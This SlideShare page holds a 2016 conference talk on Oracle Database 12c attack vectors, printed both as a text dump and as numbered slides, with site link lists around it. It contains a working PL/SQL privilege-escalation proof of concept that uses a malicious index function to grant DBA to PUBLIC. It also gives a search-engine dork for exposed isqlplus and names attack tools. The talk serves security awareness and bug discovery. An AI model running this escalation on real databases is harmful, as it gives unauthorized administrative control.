SlideShare a Scribd company logo
Oracle database 12c
attack vectors
Martin Toshev,
BGOUG, 04.06.2016
Who am I
Software consultant (CoffeeCupConsulting)
BG JUG board member (http://jug.bg)
OpenJDK and Oracle RDBMS enthusiast
Who am I
Author of Learning RabbitMQ
Agenda
• Real world examples
• Attack vectors
• Attack discovery approach
• Tools
Real world examples
Real world examples
source: http://tech.firstpost.com/news-analysis/oracles-database-secure-even-nsa-cant-hack-us-say-
larry-ellison-217341.html, 30 Jan, 2014
Real world examples
However …
Real world examples
Source: http://www.cnet.com/news/oracle-databases-easy-to-hack-says-researcher/
"Disable the protocol in Version 11.1 and start
using older versions like Version 10g," which is
not vulnerable”
they didn't fix the current version, which
leaves 11.1 and 11.2 still susceptible to attacks
Real world examples
Source: http://www.joxeankoret.com/download/tnspoison.pdf/
Real world examples
Source: http://www.itsec.gov.cn/webportal/download/2005_Search_Engine_Attack_Database.pdf
Simple example:
1) https://www.google.ca/advanced_search
2) search for ‘/isqlplus’ and specify 'URL only'
3) voila
Real world examples
Source: http://thehackernews.com/2014/08/Vulnerability-Oracle-Data-Redaction-Security.html
Real world examples
Source: http://www.reuters.com/article/us-oracle-hackers-idUSTRE56L66D20090722
http://www.theinquirer.net/inquirer/news/1469225/oracle-databases-hacked-script-kiddies
Real world examples
Source: http://www.dba-oracle.com/t_hackers_breaches_horror_stories.htm
Real world examples
Source: http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
Real world examples
• Privelege escalation via indexes in 12c:
-- from SYS: create c##autoexec user
CREATE USER c##autoexec IDENTIFIED BY 123;
GRANT CREATE SESSION TO c##autoexec;
GRANT CREATE PROCEDURE TO c##autoexec;
ALTER USER C##autoexec QUOTA 100M ON USERS;
CREATE TABLE foo (
Id int
);
INSERT INTO sys.foo values (100);
INSERT INTO sys.foo values (50);
GRANT INDEX ON foo to c##autoexec;
GRANT SELECT, INSERT ON foo TO c##autoexec;
Real world examples
• Privelege escalation via indexes in 12c:
-- from c##autoexec: attempt to set the DBA role - FAILS
SET ROLE DBA;
Real world examples
• Privelege escalation via indexes in 12c:
-- from c##autoexec
CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN
VARCHAR DETERMINISTIC AUTHID
CURRENT_USER IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
COMMIT;
RETURN 'FOO';
END;
Real world examples
• Privelege escalation via indexes in 12c:
-- from c##autoexec
GRANT EXECUTE ON GETDBA TO public;
CREATE INDEX EXPLOIT_INDEX ON
SYS.FOO(C##AUTOEXEC.GETDBA(''));
-- from SYSDBA
SELECT * FROM sys.foo;
-- from c##autoexec: SUCCESS
SET ROLE DBA;
Attack vectors
Attack vectors
• Let’s have a look at the high level architecture of
the database …
Attack vectors
unauthorized authorized
(limited permissions)
authorized
(SYSDBA)
OS
level
Attack vectors
• Attack vectors can originate from different
sources depending on the setup (we will
abstract ourselves from this criteria):
– external (applications running publicly, vulnerable
protocols running on the database servers,
malware enabling machine access)
– internal (employees with non-dba access, DBAs,
OS-level users)
Attack vectors
• Attacks from unauthorized users:
– reconnaissance:
• looking for application servers and database tools running on the
database publicly
• using search engines to find Oracle directory indices, web apps (such
as isqlplus) running publicly
• port scanning for well known ports (such as 1521 for the TNS listener)
on target machines
Attack vectors
• Attacks from unauthorized users:
– gaining access:
• exploring misconfiguration - using default credentials
• exploring lack of identity policy – password brute forcing
• exploring security bugs (e.g. buffer overflow enabling arbitrary
command execution on the TNS listener)
Attack vectors
• Attacks from unauthorized users:
– data theft:
• exploring lack of encryption leading to man-in-the-middle attacks (e.g.
TNS listener poisoning or eavesdropping)
– DoS/DDoS attacks:
• network level DoS (e.g. excessive packets)
• buffer overflow DoS (e.g. bug in the TNS listener)
Attack vectors
• Attacks from authorized users with limited
permissions:
– SQL injection (typically caused by buggy applications
having a DB user with excessive privileges)
– DoS attacks (e.g. due to misconfiguration – excessive
connections, filling shared tablespaces, running
complex queries)
Attack vectors
• Attacks from authorized users with limited
permissions:
– privilege escalation (e.g. via the INDEX permission)
– data theft (e.g. via PL/SQL procedure injection,
scheduling opening of remote socket connections to
external sources)
Attack vectors
• SYSDBA access … the world is yours
• OS level access – many methods to retrieve
passwords and useful data from raw Oracle
database files
Attack discovery approach
Attack discovery approach
• Already uncovered security bugs as the ones we
discussed are fixed and released by Oracle as
critical patch updates
• But how to uncover new bugs and ethically report
them before being discovered by attackers ?
Attack discovery approach
• Explore new features (e.g. multitenancy)
• See what parts of the security architecture of the
database are in use by these features
• Explore changes to the security architecture and
new security features
Attack discovery approach
• For top 12c new features (at a glance):
– consolidation (pluggable databases)
– redaction policy
Attack discovery approach
• For top 12c new features (at a glance):
– consolidation (pluggable databases) – resource
utilization of PDBs, access boundary between PDBs,
secure data replication between PDBs, discrepancies in
local/common users/roles ?
– redaction policy – other built-in functions/mechanisms
that can reveal redacted data ? (we already saw some)
Attack discovery approach
• For top 12c new features (at a glance):
– In Line PL/SQL Functions in SQL queries
– Online Migration of Table Partition or Sub Partition
Attack discovery approach
• For top 12c new features (at a glance):
– In Line PL/SQL Functions in SQL queries – bypassing
security mechanism, privilege escalation ?
– Online Migration of Table Partition or Sub Partition –
data theft ?
Attack discovery approach
• For top 12c new features (at a glance):
– Full Database Caching
– SQL translation framework
Attack discovery approach
• For top 12c new features (at a glance):
– Full Database Caching – buffer overflows, DoS,
malicious in-memory data manipulation ?
– SQL translation framework – malicious third-party
translation plug-ins, security bugs in translation plug-
ins ?
Attack discovery approach
explore existing attacks and security bugs (e.g.
use packet crafting tools to try buffer overflow
attacks over enhancements of database
protocols)
explore vulnerability databases such as CVE for
exploits and try to adapt some of them to new
database features
Attack discovery approach
make use of proper penetration testing tool such
as Metasploit to adapt existing attacks for
10g/11g or older versions to 12c
analyze new PL/SQL packages for security leaks
disassemble Oracle binaries
Attack discovery approach
• You may, of course, discover issues not
introduced in 12c but rather propagating through
multiple versions (such as the TNS poison
vulnerability) …
Tools
Tools
• nmap
• Metasploit
• Tnscmd
• ODAT (Oracle Database Attacking Tool)
• w32dasm/ IDA Freeware
• Kali Linux
Tools
• ODAT supports 12.1.0.2.0:
– try to find valid SIDs and credentials
– try to escalate valid account to DBA or SYSDBA
– try to execute OS commands from a valid account
Some readings that may bring ideas …
Some readings that may bring ideas …
Thank you !
Q&A
References
Oracle 12c Security whitepaper
http://www.oracle.com/technetwork/database/security/security-compliance-
wp-12c-1896112.pdf
Oracle Database 12c architecture overview
https://www.youtube.com/watch?v=266ay9N6kAw
Oracle Database 12c New security Features
http://www.trivadis.com/sites/default/files/downloads/soe_oracle_da
tabase_12_new_security_features_summary.pdf
References
Oracle Database 12c security
http://docs.oracle.com/database/121/nav/portal_25.htm
Oracle database security checklist
http://www.isaca.org/groups/professional-english/oracle-
database/groupdocuments/twp-security-checklist-database-1-132870.pdf
Encryption and Redaction in Oracle Database
12c with Oracle Advanced Security
http://www.oracle.com/technetwork/database/options/advanced-
security/advanced-security-wp-12c-1896139.pdf
References
Privelege escalation via Oracle indexes
http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
Attacking Oracle with the Metasploit Framework
http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-
OracleMetasploit-SLIDES.pdf
Oracle Database TNS Listener Poison Attack
http://www.joxeankoret.com/download/tnspoison.pdf
References
ODAT (Oracle Database Attacking Tool) tool
https://github.com/quentinhardy/odat
Oracle Database 12c CVE vulnerabilities statistics
https://www.cvedetails.com/product/467/Oracle-Database-
Server.html?vendor_id=93
Oracle Database 12c CVE vulnerabilities
https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-
467/cvssscoremin-5/cvssscoremax-5.99/Oracle-Database-Server.html

More Related Content

What's hot

BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 ||  Detecting Compromise on Windows Endpoints with Osquery  BlueHat v17 ||  Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
Chris Gates
 
NCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios appsNCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group
 
Malicious File for Exploiting Forensic Software
Malicious File for Exploiting Forensic SoftwareMalicious File for Exploiting Forensic Software
Malicious File for Exploiting Forensic Software
Takahiro Haruyama
 

What's hot (20)

Hacking oracle using metasploit
Hacking oracle using metasploitHacking oracle using metasploit
Hacking oracle using metasploit
 
State of Solr Security 2016: Presented by Ishan Chattopadhyaya, Lucidworks
State of Solr Security 2016: Presented by Ishan Chattopadhyaya, LucidworksState of Solr Security 2016: Presented by Ishan Chattopadhyaya, Lucidworks
State of Solr Security 2016: Presented by Ishan Chattopadhyaya, Lucidworks
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
 
Mitigating Java Deserialization attacks from within the JVM
Mitigating Java Deserialization attacks from within the JVMMitigating Java Deserialization attacks from within the JVM
Mitigating Java Deserialization attacks from within the JVM
 
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
 
Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014
 
Hack.Lu 2010 - Escaping Protected Mode Internet Explorer
Hack.Lu 2010 - Escaping Protected Mode Internet ExplorerHack.Lu 2010 - Escaping Protected Mode Internet Explorer
Hack.Lu 2010 - Escaping Protected Mode Internet Explorer
 
Java Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning TalkJava Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning Talk
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 ||  Detecting Compromise on Windows Endpoints with Osquery  BlueHat v17 ||  Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
NCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios appsNCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios apps
 
Malicious File for Exploiting Forensic Software
Malicious File for Exploiting Forensic SoftwareMalicious File for Exploiting Forensic Software
Malicious File for Exploiting Forensic Software
 
[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
 
Exploiting NoSQL Like Never Before
Exploiting NoSQL Like Never BeforeExploiting NoSQL Like Never Before
Exploiting NoSQL Like Never Before
 
Mitigating Java Deserialization attacks from within the JVM (improved version)
Mitigating Java Deserialization attacks from within the JVM (improved version)Mitigating Java Deserialization attacks from within the JVM (improved version)
Mitigating Java Deserialization attacks from within the JVM (improved version)
 
NoSQL, no security?
NoSQL, no security?NoSQL, no security?
NoSQL, no security?
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token Manipulation
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
 

Viewers also liked

Modularity of The Java Platform Javaday (http://javaday.org.ua/)
Modularity of The Java Platform Javaday (http://javaday.org.ua/)Modularity of The Java Platform Javaday (http://javaday.org.ua/)
Modularity of The Java Platform Javaday (http://javaday.org.ua/)
Martin Toshev
 

Viewers also liked (20)

Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Oracle database threats - LAOUC Webinar
Oracle database threats - LAOUC WebinarOracle database threats - LAOUC Webinar
Oracle database threats - LAOUC Webinar
 
Asynchroniczny PHP i komunikacja czasu rzeczywistego z wykorzystaniem websocketw
Asynchroniczny PHP i komunikacja czasu rzeczywistego z wykorzystaniem websocketwAsynchroniczny PHP i komunikacja czasu rzeczywistego z wykorzystaniem websocketw
Asynchroniczny PHP i komunikacja czasu rzeczywistego z wykorzystaniem websocketw
 
Przetwarzanie asynchroniczne w zastosowaniach webowych
Przetwarzanie asynchroniczne w zastosowaniach webowychPrzetwarzanie asynchroniczne w zastosowaniach webowych
Przetwarzanie asynchroniczne w zastosowaniach webowych
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
Sécurité informatique : le Retour sur Investissement que vous n'attendiez pas
Sécurité informatique : le Retour sur Investissement que vous n'attendiez pasSécurité informatique : le Retour sur Investissement que vous n'attendiez pas
Sécurité informatique : le Retour sur Investissement que vous n'attendiez pas
 
Modularity of The Java Platform Javaday (http://javaday.org.ua/)
Modularity of The Java Platform Javaday (http://javaday.org.ua/)Modularity of The Java Platform Javaday (http://javaday.org.ua/)
Modularity of The Java Platform Javaday (http://javaday.org.ua/)
 
Writing Stored Procedures with Oracle Database 12c
Writing Stored Procedures with Oracle Database 12cWriting Stored Procedures with Oracle Database 12c
Writing Stored Procedures with Oracle Database 12c
 
Writing Stored Procedures in Oracle RDBMS
Writing Stored Procedures in Oracle RDBMSWriting Stored Procedures in Oracle RDBMS
Writing Stored Procedures in Oracle RDBMS
 
Writing Java Stored Procedures in Oracle 12c
Writing Java Stored Procedures in Oracle 12cWriting Java Stored Procedures in Oracle 12c
Writing Java Stored Procedures in Oracle 12c
 
Modular Java
Modular JavaModular Java
Modular Java
 
RxJS vs RxJava: Intro
RxJS vs RxJava: IntroRxJS vs RxJava: Intro
RxJS vs RxJava: Intro
 
Spring RabbitMQ
Spring RabbitMQSpring RabbitMQ
Spring RabbitMQ
 
KDB database (EPAM tech talks, Sofia, April, 2015)
KDB database (EPAM tech talks, Sofia, April, 2015)KDB database (EPAM tech talks, Sofia, April, 2015)
KDB database (EPAM tech talks, Sofia, April, 2015)
 
hacking with node.JS
hacking with node.JShacking with node.JS
hacking with node.JS
 
Eclipse plug in development
Eclipse plug in developmentEclipse plug in development
Eclipse plug in development
 
JVM++: The Graal VM
JVM++: The Graal VMJVM++: The Graal VM
JVM++: The Graal VM
 
Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.js
 
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injectionStHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
 
Oracle database 12c client installation overview
Oracle database 12c client installation overviewOracle database 12c client installation overview
Oracle database 12c client installation overview
 

Similar to Oracle Database 12c Attack Vectors

SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
Rod Soto
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
Dmitry Evteev
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
devilback
 

Similar to Oracle Database 12c Attack Vectors (20)

Protecting Against Web Attacks
Protecting Against Web AttacksProtecting Against Web Attacks
Protecting Against Web Attacks
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an..."Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Threat_Modelling.pdf
Threat_Modelling.pdfThreat_Modelling.pdf
Threat_Modelling.pdf
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
 
Protecting Against Web App Attacks
Protecting Against Web App AttacksProtecting Against Web App Attacks
Protecting Against Web App Attacks
 
Introduction to libre « fulltext » technology
Introduction to libre « fulltext » technologyIntroduction to libre « fulltext » technology
Introduction to libre « fulltext » technology
 
Software Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and SecuritySoftware Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and Security
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0
 
OWASP Dependency-Track Introduction
OWASP Dependency-Track IntroductionOWASP Dependency-Track Introduction
OWASP Dependency-Track Introduction
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your network
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
Software Mining and Software Datasets
Software Mining and Software DatasetsSoftware Mining and Software Datasets
Software Mining and Software Datasets
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
Elastic pivorak
Elastic pivorakElastic pivorak
Elastic pivorak
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 

More from Martin Toshev

Semantic Technology In Oracle Database 12c
Semantic Technology In Oracle Database 12cSemantic Technology In Oracle Database 12c
Semantic Technology In Oracle Database 12c
Martin Toshev
 
Concurrency Utilities in Java 8
Concurrency Utilities in Java 8Concurrency Utilities in Java 8
Concurrency Utilities in Java 8
Martin Toshev
 

More from Martin Toshev (13)

Building highly scalable data pipelines with Apache Spark
Building highly scalable data pipelines with Apache SparkBuilding highly scalable data pipelines with Apache Spark
Building highly scalable data pipelines with Apache Spark
 
Big data processing with Apache Spark and Oracle Database
Big data processing with Apache Spark and Oracle DatabaseBig data processing with Apache Spark and Oracle Database
Big data processing with Apache Spark and Oracle Database
 
Jdk 10 sneak peek
Jdk 10 sneak peekJdk 10 sneak peek
Jdk 10 sneak peek
 
Semantic Technology In Oracle Database 12c
Semantic Technology In Oracle Database 12cSemantic Technology In Oracle Database 12c
Semantic Technology In Oracle Database 12c
 
Practical security In a modular world
Practical security In a modular worldPractical security In a modular world
Practical security In a modular world
 
Java 9 Security Enhancements in Practice
Java 9 Security Enhancements in PracticeJava 9 Security Enhancements in Practice
Java 9 Security Enhancements in Practice
 
Java 9 sneak peek
Java 9 sneak peekJava 9 sneak peek
Java 9 sneak peek
 
Spring RabbitMQ
Spring RabbitMQSpring RabbitMQ
Spring RabbitMQ
 
Concurrency Utilities in Java 8
Concurrency Utilities in Java 8Concurrency Utilities in Java 8
Concurrency Utilities in Java 8
 
The RabbitMQ Message Broker
The RabbitMQ Message BrokerThe RabbitMQ Message Broker
The RabbitMQ Message Broker
 
java2days 2014: Attacking JavaEE Application Servers
java2days 2014: Attacking JavaEE Application Serversjava2days 2014: Attacking JavaEE Application Servers
java2days 2014: Attacking JavaEE Application Servers
 
Modularity of the Java Platform (OSGi, Jigsaw and Penrose)
Modularity of the Java Platform (OSGi, Jigsaw and Penrose)Modularity of the Java Platform (OSGi, Jigsaw and Penrose)
Modularity of the Java Platform (OSGi, Jigsaw and Penrose)
 
New Features in JDK 8
New Features in JDK 8New Features in JDK 8
New Features in JDK 8
 

Recently uploaded

AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
Alluxio, Inc.
 

Recently uploaded (20)

Facemoji Keyboard released its 2023 State of Emoji report, outlining the most...
Facemoji Keyboard released its 2023 State of Emoji report, outlining the most...Facemoji Keyboard released its 2023 State of Emoji report, outlining the most...
Facemoji Keyboard released its 2023 State of Emoji report, outlining the most...
 
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?
 
Secure Software Ecosystem Teqnation 2024
Secure Software Ecosystem Teqnation 2024Secure Software Ecosystem Teqnation 2024
Secure Software Ecosystem Teqnation 2024
 
5 Reasons Driving Warehouse Management Systems Demand
5 Reasons Driving Warehouse Management Systems Demand5 Reasons Driving Warehouse Management Systems Demand
5 Reasons Driving Warehouse Management Systems Demand
 
GraphSummit Stockholm - Neo4j - Knowledge Graphs and Product Updates
GraphSummit Stockholm - Neo4j - Knowledge Graphs and Product UpdatesGraphSummit Stockholm - Neo4j - Knowledge Graphs and Product Updates
GraphSummit Stockholm - Neo4j - Knowledge Graphs and Product Updates
 
CompTIA Security+ (Study Notes) for cs.pdf
CompTIA Security+ (Study Notes) for cs.pdfCompTIA Security+ (Study Notes) for cs.pdf
CompTIA Security+ (Study Notes) for cs.pdf
 
top nidhi software solution freedownload
top nidhi software solution freedownloadtop nidhi software solution freedownload
top nidhi software solution freedownload
 
A Comprehensive Appium Guide for Hybrid App Automation Testing.pdf
A Comprehensive Appium Guide for Hybrid App Automation Testing.pdfA Comprehensive Appium Guide for Hybrid App Automation Testing.pdf
A Comprehensive Appium Guide for Hybrid App Automation Testing.pdf
 
AI/ML Infra Meetup | Perspective on Deep Learning Framework
AI/ML Infra Meetup | Perspective on Deep Learning FrameworkAI/ML Infra Meetup | Perspective on Deep Learning Framework
AI/ML Infra Meetup | Perspective on Deep Learning Framework
 
Studiovity film pre-production and screenwriting software
Studiovity film pre-production and screenwriting softwareStudiovity film pre-production and screenwriting software
Studiovity film pre-production and screenwriting software
 
A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1
A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1
A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1
 
AI/ML Infra Meetup | Reducing Prefill for LLM Serving in RAG
AI/ML Infra Meetup | Reducing Prefill for LLM Serving in RAGAI/ML Infra Meetup | Reducing Prefill for LLM Serving in RAG
AI/ML Infra Meetup | Reducing Prefill for LLM Serving in RAG
 
Into the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdfInto the Box 2024 - Keynote Day 2 Slides.pdf
Into the Box 2024 - Keynote Day 2 Slides.pdf
 
10 Essential Software Testing Tools You Need to Know About.pdf
10 Essential Software Testing Tools You Need to Know About.pdf10 Essential Software Testing Tools You Need to Know About.pdf
10 Essential Software Testing Tools You Need to Know About.pdf
 
Abortion ^Clinic ^%[+971588192166''] Abortion Pill Al Ain (?@?) Abortion Pill...
Abortion ^Clinic ^%[+971588192166''] Abortion Pill Al Ain (?@?) Abortion Pill...Abortion ^Clinic ^%[+971588192166''] Abortion Pill Al Ain (?@?) Abortion Pill...
Abortion ^Clinic ^%[+971588192166''] Abortion Pill Al Ain (?@?) Abortion Pill...
 
A Guideline to Zendesk to Re:amaze Data Migration
A Guideline to Zendesk to Re:amaze Data MigrationA Guideline to Zendesk to Re:amaze Data Migration
A Guideline to Zendesk to Re:amaze Data Migration
 
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with StrimziStrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi
 
OpenChain @ LF Japan Executive Briefing - May 2024
OpenChain @ LF Japan Executive Briefing - May 2024OpenChain @ LF Japan Executive Briefing - May 2024
OpenChain @ LF Japan Executive Briefing - May 2024
 
KLARNA - Language Models and Knowledge Graphs: A Systems Approach
KLARNA -  Language Models and Knowledge Graphs: A Systems ApproachKLARNA -  Language Models and Knowledge Graphs: A Systems Approach
KLARNA - Language Models and Knowledge Graphs: A Systems Approach
 
AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
 

Oracle Database 12c Attack Vectors

  • 1. Oracle database 12c attack vectors Martin Toshev, BGOUG, 04.06.2016
  • 2. Who am I Software consultant (CoffeeCupConsulting) BG JUG board member (http://jug.bg) OpenJDK and Oracle RDBMS enthusiast
  • 3. Who am I Author of Learning RabbitMQ
  • 4. Agenda • Real world examples • Attack vectors • Attack discovery approach • Tools
  • 6. Real world examples source: http://tech.firstpost.com/news-analysis/oracles-database-secure-even-nsa-cant-hack-us-say- larry-ellison-217341.html, 30 Jan, 2014
  • 8. Real world examples Source: http://www.cnet.com/news/oracle-databases-easy-to-hack-says-researcher/ "Disable the protocol in Version 11.1 and start using older versions like Version 10g," which is not vulnerable” they didn't fix the current version, which leaves 11.1 and 11.2 still susceptible to attacks
  • 9. Real world examples Source: http://www.joxeankoret.com/download/tnspoison.pdf/
  • 10. Real world examples Source: http://www.itsec.gov.cn/webportal/download/2005_Search_Engine_Attack_Database.pdf Simple example: 1) https://www.google.ca/advanced_search 2) search for ‘/isqlplus’ and specify 'URL only' 3) voila
  • 11. Real world examples Source: http://thehackernews.com/2014/08/Vulnerability-Oracle-Data-Redaction-Security.html
  • 12. Real world examples Source: http://www.reuters.com/article/us-oracle-hackers-idUSTRE56L66D20090722 http://www.theinquirer.net/inquirer/news/1469225/oracle-databases-hacked-script-kiddies
  • 13. Real world examples Source: http://www.dba-oracle.com/t_hackers_breaches_horror_stories.htm
  • 14. Real world examples Source: http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
  • 15. Real world examples • Privelege escalation via indexes in 12c: -- from SYS: create c##autoexec user CREATE USER c##autoexec IDENTIFIED BY 123; GRANT CREATE SESSION TO c##autoexec; GRANT CREATE PROCEDURE TO c##autoexec; ALTER USER C##autoexec QUOTA 100M ON USERS; CREATE TABLE foo ( Id int ); INSERT INTO sys.foo values (100); INSERT INTO sys.foo values (50); GRANT INDEX ON foo to c##autoexec; GRANT SELECT, INSERT ON foo TO c##autoexec;
  • 16. Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec: attempt to set the DBA role - FAILS SET ROLE DBA;
  • 17. Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC'; COMMIT; RETURN 'FOO'; END;
  • 18. Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec GRANT EXECUTE ON GETDBA TO public; CREATE INDEX EXPLOIT_INDEX ON SYS.FOO(C##AUTOEXEC.GETDBA('')); -- from SYSDBA SELECT * FROM sys.foo; -- from c##autoexec: SUCCESS SET ROLE DBA;
  • 20. Attack vectors • Let’s have a look at the high level architecture of the database …
